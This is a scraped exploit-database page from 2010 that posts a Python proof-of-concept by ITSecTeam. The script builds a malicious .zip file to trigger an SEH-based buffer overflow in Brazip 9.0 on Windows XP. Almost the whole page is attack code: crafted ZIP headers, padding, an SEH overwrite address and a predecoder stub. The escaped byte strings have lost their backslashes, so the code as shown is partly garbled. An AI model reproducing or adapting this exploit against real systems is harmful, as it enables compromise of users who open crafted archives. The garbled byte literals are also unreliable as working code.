Home / os / win7

Brazip 9.0 (.zip File) Buffer Overflow (SEH)

Posted on 17 August 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Brazip 9.0 (.zip File) Buffer Overflow (SEH)</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================
Brazip 9.0 (.zip File) Buffer Overflow (SEH)
============================================

#!user/bin/python
######################################################################
# Brazip 9.0 (.zip File) BoF Poc (SEH)
# Homepage  : www.brazip.com.br
# Version   : 9.0
# Tested Os : Windows XP SP1/SP3 EN
# Usage     : $ Python Brazip-poc.py
######################################################################
#AUTHOR: ITSecTeam
#Email: Bug@ITSecTeam.com
#Website: http://www.itsecteam.com
#Forum : http://forum.ITSecTeam.com
#Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability60.htm
#Thanks: Hoshang jafari  aka [PLATEN]
######################################################################
import sys
print __banner__
 
header_1 =(&quot;x50x4Bx03x04x14x00x00&quot;
&quot;x00x00x00xB7xACxCEx34x00x00x00&quot;
&quot;x00x00x00x00x00x00x00x00&quot;
&quot;xe4x0f&quot;
&quot;x00x00x00&quot;)
  
header_2 = (&quot;x50x4Bx01x02x14x00x14&quot;
&quot;x00x00x00x00x00xB7xACxCEx34x00x00x00&quot;
&quot;x00x00x00x00x00x00x00x00x00&quot;
&quot;xe4x0f&quot;
&quot;x00x00x00x00x00x00x01x00&quot;
&quot;x24x00x00x00x00x00x00x00&quot;)
  
header_3 = (&quot;x50x4Bx05x06x00x00x00&quot;
&quot;x00x01x00x01x00&quot;
&quot;x12x10x00x00&quot;
&quot;x02x10x00x00&quot;
&quot;x00x00&quot;)
nseh=&quot;x41x41x41x41&quot; 
seh=&quot;x65x47x7ex6d&quot;  
 
payload = &quot;A&quot; * 297 + nseh  + seh
 
predecoder = &quot;x59x59x59x51x5c&quot;
payload=payload+predecoder
filltoebx=&quot;B&quot; * (100-len(predecoder))
rest = &quot;C&quot; *  (4064-len(payload+filltoebx)) + &quot;.txt&quot;
payload = payload+filltoebx+rest
exploit = header_1 + payload + header_2 + payload + header_3
  
try:
    f=open(&quot;Brazip-poc.zip&quot;,'w')
    f.write(exploit)
    f.close()
    print   &quot;[+] File created successfully !&quot;
    sys.exit(0)
except:
    print &quot;[-] Error cant write file to system
&quot;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-17]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :